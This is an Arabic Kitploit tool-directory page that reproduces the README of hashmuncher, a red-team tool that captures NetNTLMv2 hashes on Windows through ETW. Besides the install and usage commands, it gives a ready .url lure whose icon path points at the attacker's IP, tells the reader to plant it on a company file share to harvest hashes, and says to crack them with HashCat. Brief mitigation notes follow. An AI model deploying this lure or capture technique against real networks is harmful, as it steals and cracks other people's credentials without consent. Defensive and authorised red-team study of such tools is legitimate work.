Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/lkarlslund/hashmuncher
التقاط وتحليل الحزمهجمات كلمات المرورتحليل التجزئةجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHublkarlslund/hashmuncher

hashmuncher

التقط هاشات NetNTLMv2 باستخدام ETW بصلاحيات إدارية على Windows 8.1 / Windows Server 2016 والإصدارات الأحدث

عرض المستودع
12676منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Hash Muncher

التقط تجزئات NetNTLMv2 باستخدام ETW بصلاحيات إدارية على ويندوز

GitHub all releases GitHub Workflow Status

  • يتطلب وصولًا بصلاحيات مرتفعة (المسؤول) على ويندوز 8.1 / ويندوز 2016 أو أحدث
  • يستخدم Event Tracing for Windows (ETW) للوصول إلى بيانات الحزم الخام لحزم مصادقة SMB
  • يفك ترميز رسائل NTLM من النوعين 2 و3
  • يخرج المخرجات إلى stdout أو إلى ملف
  • اضغط Ctrl-C لإيقاف المعالجة أو استخدم خيار timeout
  • اكسر التجزئات باستخدام HashCat مع -m 5600

الحصول على Hash Muncher

ثلاثة خيارات مختلفة لتشغيله

أ) نزّل الملفات الثنائية المبنية تلقائيًا من الإصدارات

ب) البناء والتثبيت على ويندوز باستخدام أمر Go هذا

  • يتطلب Golang
root@kitploit:~
go install github.com/lkarlslund/hashmuncher@latest

ج) البناء المتقاطع لملفات ويندوز الثنائية على أي منصة تدعم Golang مع تثبيت PowerShell

  • يتطلب Golang وPowerShell
root@kitploit:~
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1

الاستخدام

  1. تأكد من أن جدار حماية ويندوز يسمح بـ"مشاركة الملفات والطابعات"، لأن Hash Muncher يتطلب خدمة SMB المدمجة لإرسال واستقبال الطلب الأولي وحزم الاستجابة إلى الهدف.

  2. في موجه أوامر بصلاحيات مرتفعة، شغّل Hash Muncher

root@kitploit:~
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
  1. انتظر الآن حتى يوثّق شخص ما هويته على جهازك، أو ازرع اختصار URL في مشاركة ملفات مشتركة شائعة مثل المثال أدناه.
root@kitploit:~
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1

استبدل عنوان IP بعنوان جهاز Hash Muncher الخاص بك، واحفظ الملف في مشاركة ملفات (على مستوى الشركة) بالاسم 'whatever.url'، وشاهد التجزئات تنهال عليك.

توجد طرق أخرى مذكورة في Red Team Notes - المصادقة القسرية، ويمكنك على الأرجح أيضًا أن تحقق نجاحًا بإرسال مستند Word للجميع عبر البريد، لكنه ليس أسلوبًا خفيًا إطلاقًا.

الاكتشاف

  • لا أعرف أي اكتشاف حتى الآن، لكن يرجى ترك ملاحظاتك

التخفيف

  • لا يوجد تخفيف لجزء ETW؛ فهذا جزء من تصميم ويندوز وفقًا لمايكروسوفت
  • استخدم كلمات مرور قوية! كسر NetNTLMv2 ليس سريعًا إطلاقًا، لكن مع كلمات المرور الضعيفة يمكن القيام به بالتأكيد.
  • عطّل NTLM تمامًا! من المحتمل ألا يكون خاليًا من الألم - لكن انظر وداعًا NTLM - حان الوقت لتعطيل NTLM

التاريخ

لقد كنت أتلاعب بـ ETW بين الحين والآخر، لكن بمجرد أن رأيت البحث الرائع من Nettitude Labs عرفت أنه يجب أن أحوّل هذا إلى أداة سهلة الاستخدام بلغتي المفضلة Golang! لدى Nettitude Labs إثبات مفهوم POC عامل مكتوب بلغة C# ويعمل ضمن إطار عمل .Net، وقد يكون خيارًا أفضل لك. لذا أنا لا أخترع شيئًا جديدًا هنا، بل أضيف هذه الأداة كبديل.

إذا كنت تهتم بأمان ويندوز، فقد تعجبك أيضًا أداة مخططات الهجمات الخاصة بي Adalanche

تنزيل الأداة